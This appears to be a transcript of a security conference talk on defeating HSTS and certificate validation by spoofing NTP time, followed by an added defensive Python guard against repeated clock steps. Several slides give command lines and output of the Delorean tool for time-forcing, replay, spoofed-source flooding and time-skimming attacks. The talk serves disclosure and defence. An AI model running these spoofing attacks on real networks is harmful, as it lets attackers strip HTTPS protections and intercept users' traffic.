Breaking SSL using time synchronisation attacks

  1. 1. Breaking SSL using time synchronisation attacks Jose Selvi, Senior Security Consultant
  2. 2. $ whois jselvi Jose Selvi +10 years working in security Senior Security Consultant SANS Institute Community Instructor GIAC Security Expert (GSE) Twitter: @JoseSelvi Blog: http://www.pentester.es
  3. 3. Valencia: Beach, Sun & Hacking
  4. 4. Valencia: Beach, Sun & Hacking
  5. 5. What's the time?
  6. 6. Disclaimer
  7. 7. Let's Go! Starting from the beginning; HTTP Strict Transport Security; Get in a Delorean; Modern Time Synchronisation; More attacks; Windows task scheduler; Public Key Infrastructure; Conclusions & Recommendations
  8. 8. HTTP Strict Transport Security RFC-6797: November 2012. Also known as HSTS or STS. Prevent HTTP connections. Prevent accepting self-signed and rogue certificates. Use a new Strict-Transport-Security header.
  9. 9. How does it work? Client to Server (HTTPS): GET / HTTP/1.1. Server to Client: Strict-Transport-Security: max-age=3153600
  10. 10. HSTS Timeline HTTPS connection 3153600 secs later
  11. 11. Preloaded HSTS Hardcoded list of well known website names that should always use HTTPS. Prevent the security gap before the first HTTPS connection. Google, Twitter, Paypal,
  12. 12. HTTPS connection 3153600 secs later
  13. 13. 3153600 secs later
  14. 14. Preloaded HSTS - Google http://www.chromium.org/sts
  15. 15. Preloaded HSTS - Mozilla https://blog.mozilla.org/security/2012/11/01/preloading-hsts/
  16. 16. Preloaded HSTS - Others
  17. 17. Chromium Source Code
  18. 18. Safari plist $ plutil -p HSTS.plist { "com.apple.CFNetwork.defaultStorageSession" => { "ssl.google-analytics.com" => -inf "webmail.mayfirst.org" => -inf "braintreegateway.com" => -inf "code.google.com" => -inf "dm.mylookout.com" => inf "therapynotes.com" => inf "chrome.google.com" => -inf "sol.io" => -inf "www.sandbox.mydigipass.com" => inf []
  19. 19. HSTS weakness Its security relies on time. It completely trusts the OS's current time. What if I could change the computer clock from the network?
  20. 20. Let's Go! Starting from the beginning; HTTP Strict Transport Security; Get in a Delorean; Modern Time Synchronisation; More attacks; Windows task scheduler; Public Key Infrastructure; Conclusions & Recommendations
  21. 21. Network Time Protocol (NTP) Time Synchronisation Services. RFC-1305 (v3) / RFC-5905 (v4) / RFC-4330 (SNTPv4). By default in (almost) all operating systems. Not secured by default. Vulnerable to Man-in-the-Middle attacks.
  22. 22. NTP Packet: Ubuntu
  23. 23. Delorean NTP MitM Tool. Free. Open Source. Python. http://github.com/PentesterES/Delorean Based on limifly's work: http://github.com/limifly/ntpserver Implements several attacks. It pretends to be an NTP attack suite.
  24. 24. Delorean $ ./delorean.py -h Usage: delorean.py [options] Options: -h, --help show this help message and exit -i INTERFACE, --interface=INTERFACE Listening interface -p PORT, --port=PORT Listening port -n, --nobanner Not show Delorean banner -s STEP, --force-step=STEP Force the time step: 3m (minutes), 4d (days), 1M (month) -d DATE, --force-date=DATE Force the date: YYYY-MM-DD hh:mm[:ss] -x, --random-date Use random date each time
  25. 25. Basic attacks # ./delorean.py -n [19:44:42] Sent to 192.168.10.113:123 - Going to the future! 2018-08-31 19:44 [19:45:18] Sent to 192.168.10.113:123 - Going to the future! 2018-08-31 19:45 # ./delorean.py -d 2020-08-01 23:15 -n [19:49:50] Sent to 127.0.0.1:48473 - Going to the future! 2020-08-01 21:15 [19:50:10] Sent to 127.0.0.1:52406 - Going to the future! 2020-08-01 21:15 # ./delorean.py -r -x [19:51:17] Sent to 127.0.0.1:37680 - Going to the future! 2023-07-19 20:48 [19:51:21] Sent to 127.0.0.1:37680 - Going to the future! 2019-03-12 10:11 # ./delorean.py -s 10d -n [19:46:09] Sent to 192.168.10.113:123 - Going to the future! 2015-08-10 19:46 [19:47:19] Sent to 192.168.10.113:123 - Going to the future! 2015-08-10 19:47
  26. 26. DEMO
  27. 27. Replay Attack $ ./delorean.py -n -r capture.pcap [06:19:13] Replayed to 192.168.10.105:39895 - Going to the past! 2015-06-24 21:41 [06:19:17] Replayed to 192.168.10.105:39895 - Going to the past! 2015-06-24 21:41
  28. 28. Spoofing Attack $ ./delorean.py -n -f 192.168.10.10 -o 8.8.8.8 -r capture.pcap Flooding to 192.168.10.10 $ tcpdump -nn -p -i eth1 host 192.168.10.10 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes 08:26:07.621412 IP 8.8.8.8.123 > 192.168.10.10.123: NTPv4, Server, length 48 08:26:07.682578 IP 8.8.8.8.123 > 192.168.10.10.123: NTPv4, Server, length 48 08:26:07.761407 IP 8.8.8.8.123 > 192.168.10.10.123: NTPv4, Server, length 48 08:26:07.766434 IP 8.8.8.8.123 > 192.168.10.10.123: NTPv4, Server, length 48 08:26:07.843923 IP 8.8.8.8.123 > 192.168.10.10.123: NTPv4, Server, length 48 08:26:07.905666 IP 8.8.8.8.123 > 192.168.10.10.123: NTPv4, Server, length 48 08:26:07.922923 IP 8.8.8.8.123 > 192.168.10.10.123: NTPv4, Server, length 48
  29. 29. Anti replaying
  30. 30. Let's Go! Starting from the beginning; HTTP Strict Transport Security; Get in a Delorean; Modern Time Synchronisation; More attacks; Windows task scheduler; Public Key Infrastructure; Conclusions & Recommendations
  31. 31. Ubuntu Linux Very simple NTPv4. Each time it connects to a network (and at boot time, of course). $ ls /etc/network/if-up.d/ 000resolvconf avahi-daemon ntpdate wpasupplicant avahi-autoipd ethtool upstart
  32. 32. Fedora Linux The easiest NTPv3. More than one NTP server Requests each minute! $ tcpdump -i eth0 -nn src port 123 12:43:50.614191 IP 192.168.1.101.123 > 89.248.106.98.123: NTPv3, Client, length 48 12:44:55.696390 IP 192.168.1.101.123 > 213.194.159.3.123: NTPv3, Client, length 48 12:45:59.034059 IP 192.168.1.101.123 > 89.248.106.98.123: NTPv3, Client, length 48
  33. 33. Mac OS X - Mavericks New synchronisation service. NTP daemon exists, but does not synchronise. Just writes in /var/db/ntp.drift. A new service called pacemaker checks that file and changes the clock. It seems it doesn't work as it should http://www.atmythoughts.com/living-in-a-tech-family-blog/2014/2/28/what-time-is-it
  34. 34. Does NTP work?
  35. 35. /usr/libexec/ntpd-wrapper
  36. 36. Mac OS X - Mavericks
  37. 37. Windows NTPv3 but The most secure. Synchronisation each 7 days. More than 15 hours drift isn't allowed. Domain members work in a different way.
  38. 38. W32time service
  39. 39. Max[Pos|Neg]PhaseCorrection: W7 / W8: 15 hours; W2K12: 48 hours
  40. 40. What does the Internet say?
  41. 41. Time Skimming Attack 3153600 secs later Time Sync
  42. 42. Time Skimming Attack 3153600 secs later Time Sync
  43. 43. Time Skimming Attack # ./delorean.py -k 15h -t 10s -n [21:57:26] Sent to 192.168.10.105:123 - Going to the future! 2015-06-11 12:57 [21:57:33] Sent to 192.168.10.105:123 - Going to the future! 2015-06-12 03:57 [21:57:37] Sent to 192.168.10.105:123 - Going to the future! 2015-06-12 18:56 [21:57:44] Sent to 192.168.10.105:123 - Going to the future! 2015-06-13 09:56 [21:57:50] Sent to 192.168.10.105:123 - Going to the future! 2015-06-14 00:56 [21:57:58] Sent to 192.168.10.105:123 - Going to the future! 2015-06-14 15:56 [21:58:04] Sent to 192.168.10.105:123 - Going to the future! 2015-06-15 06:56 [21:58:11] Sent to 192.168.10.105:123 - Going to the future! 2015-06-15 21:56 [21:58:17] Sent to 192.168.10.105:123 - Going to the future! 2015-06-16 12:56
  44. 44. DEMO
  45. 45. Manual Synchronisation
  46. 46. Not a silver bullet
  47. 47. Lots of things go wrong
  48. 48. Let's Go! Starting from the beginning; HTTP Strict Transport Security; Get in a Delorean; Modern Time Synchronisation; More attacks; Windows task scheduler; Public Key Infrastructure; Conclusions & Recommendations
  49. 49. Task scheduler
  50. 50. Windows automatic updates
  51. 51. Let's Go! Starting from the beginning; HTTP Strict Transport Security; Get in a Delorean; Modern Time Synchronisation; More attacks; Windows task scheduler; Public Key Infrastructure; Conclusions & Recommendations
  52. 52. PKI, CAs & Certificates
  53. 53. Certificates from the past Data: Version: 3 (0x2) Serial Number: 5d:9e:f1:65:7f:f4:0c:14:e4:19:46:87:0b:b3:7b:fc Signature Algorithm: sha1WithRSAEncryption Issuer: C=US, ST=UT, L=Salt Lake City, O=The USERTRUST Network, OU=http://www.usertrust.com, CN=UTN-USERFirst-Hardware Validity Not Before: Sep 19 00:00:00 2008 GMT Not After : Nov 22 23:59:59 2010 GMT Subject: O=The SANS Institute, OU=Network Operations Center (NOC), OU=Comodo PremiumSSL Wildcard, CN=*.sans.org
  54. 54. Edo Tensei no Jutsu!
  55. 55. Weak certificates https://www.eff.org/observatory
  56. 56. Looking around Las Vegas
  57. 57. Let's look at any other
  58. 58. cado-nfs + ec2 in action
  59. 59. DEMO
  60. 60. Leaked certificates Certificate: Data: Version: 3 (0x2) Serial Number: 05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56 Signature Algorithm: sha1WithRSAEncryption Issuer: emailAddress = [email protected] commonName = DigiNotar Public CA 2025 organizationName = DigiNotar countryName = NL Validity Not Before: Jul 10 19:06:30 2011 GMT Not After : Jul 9 19:06:30 2013 GMT Subject: commonName = *.google.com serialNumber = PK000229200002 localityName = Mountain View organizationName = Google Inc countryName = US Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (2048 bit) Modulus (2048 bit):
  61. 61. Heartbleed
  62. 62. Debian PRNG
  63. 63. Certificate Chain
  64. 64. Revocation lists Revoked Certificates: Serial Number: 08CA22CD4F70A626B07C7A4DB75494FA Revocation Date: Nov 21 16:46:04 2013 GMT Serial Number: 017D4D9DF57B784B5D7DF0B9D450D37E Revocation Date: Nov 21 16:46:04 2013 GMT Serial Number: 061AD6AD34F67938C0870AAF74FC041A Revocation Date: Nov 21 17:16:03 2013 GMT Serial Number: 0FBBD7921F710C02FD9AFF2D4DDCDF12 Revocation Date: Nov 21 17:28:02 2013 GMT Serial Number: 0656A344CD735B2C52858A4A2AF96EE6 Revocation Date: Nov 21 18:23:02 2013 GMT Serial Number: 0F0C3DC4EE1229E280938DF6A889B178 Revocation Date: Nov 22 07:21:03 2013 GMT Serial Number: 0536AC86E884BE1773A78D4D232691A5 Revocation Date: Nov 22 09:52:05 2013 GMT Serial Number: 0335D45DC4E571A37BDE1869B44C1306 Revocation Date: Nov 24 00:45:02 2013 GMT
  65. 65. A CRL over the years
  66. 66. Purged CRLs???
  67. 67. Purged CRLs??? CRL / Issued date / Oldest revoked: DigiCert SHA2 Extended Validation Server CA (Dropbox, GitHub): 22/Oct/2013, 13/Dec/2013 (330 certs); DigiCert High Assurance CA-3 (Facebook): 02/Apr/2008, 14/Jun/2012, 27/Sep/2014; GeoTrust Global CA (Google): 20/May/2002, 21/May/2002 (9 certs); GlobalSign Organization Validation CA - SHA256 - G2 (LogmeIn): 20/Feb/2014, 31/Mar/2014 (637 certs); VeriSign Class 3 Extended Validation SSL CA (Microsoft, Paypal, Twitter): 08/Nov/2006, 04/Dec/2012 (1709 certs); VeriSign Class 3 Secure Server CA - G3 (Yahoo): 07/Feb/2010, 10/Oct/2010 (41120 certs)
  68. 68. Online Certificate Status Protocol
  69. 69. What if I can't connect? https://www.grc.com/revocation/implementations.htm
  70. 70. DEMO
  71. 71. Let's Go! Starting from the beginning; HTTP Strict Transport Security; Get in a Delorean; Modern Time Synchronisation; More attacks; Windows task scheduler; Public Key Infrastructure; Conclusions & Recommendations
  72. 72. Conclusions & Recommendations Facts: Time synchronisation isn't managed securely by most operating system vendors. Many security protections rely on time. If an attacker can control the local clock, lots of things can go wrong. What to do: Configure NTP synchronisation in a secure way (Microsoft does): Signature. Maximum drift. Block SSL certificates whose expiry date is before the browser build date or the last update (Chrome does).
  73. 73. Special thanks to Pedro Candel (my leaked certs dealer). Juan Garrido (microsoft guru). Tom Ritter (my factoring mentor). All the NCC Group guys and resources. /mode +nostalgic JoseSelvi People who created the Back to the Future saga, War Games, and all those amazing 80s movies and series :)
  74. 74. 71 Jose Selvi http://twitter.com/JoseSelvi [email protected] http://www.pentester.es [email protected] http://www.nccgroup.trust Thanks! Questions?
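
The "Maximum drift" recommendation on slide 72 only holds if the limit also covers repeated corrections, which is the gap the Time Skimming slides (41-43) show. The following is an added example, not code from the talk or from Delorean: a guard that applies the 15-hour cap from slide 39 to each correction and to the running total inside a window measured on a monotonic clock. `StepGuard`, `replay`, the 7-day window and the sample events are assumptions made for illustration.

```python
from collections import deque
from dataclasses import dataclass, field

MAX_PHASE_CORRECTION = 15 * 3600   # per-sync cap in seconds (W7 / W8 value, slide 39)
BUDGET_WINDOW = 7 * 24 * 3600      # assumption: budget window equals the 7-day sync interval


@dataclass
class StepGuard:
    """Decides whether a clock correction proposed by a time source is applied."""
    cap: int = MAX_PHASE_CORRECTION
    window: int = BUDGET_WINDOW
    accepted: deque = field(default_factory=deque)   # (monotonic_s, offset_s)

    def check(self, monotonic_s: float, offset_s: float) -> str:
        # 1. Per-sync limit: a single correction larger than the cap is refused.
        if abs(offset_s) > self.cap:
            return "reject:step-too-large"
        # 2. Forget corrections older than the window. Elapsed time comes from
        #    a monotonic clock, which network time cannot move.
        while self.accepted and monotonic_s - self.accepted[0][0] > self.window:
            self.accepted.popleft()
        # 3. Cumulative limit: several small steps must not add up past the cap.
        total = sum(off for _, off in self.accepted) + offset_s
        if abs(total) > self.cap:
            return "reject:cumulative-drift"
        self.accepted.append((monotonic_s, offset_s))
        return "accept"


def replay(events, guard=None):
    """Run (monotonic_s, offset_s) sync events through a guard; return the verdicts."""
    guard = guard or StepGuard()
    return [guard.check(t, off) for t, off in events]


# Constructed sample shaped like slide 43: a response every few seconds,
# each one moving the clock just under 15 hours forward.
SKIMMING = [(0, 53990), (7, 53990), (11, 53990), (18, 53990)]
# Constructed sample: ordinary weekly syncs correcting a few seconds of drift.
NORMAL = [(0, 2.5), (604800, -1.2), (1209600, 3.1)]

if __name__ == "__main__":
    print(replay(SKIMMING))
    print(replay(NORMAL))
```

A rejected correction is also a detection signal: several `reject:cumulative-drift` verdicts within seconds of each other match the response pattern on slide 43.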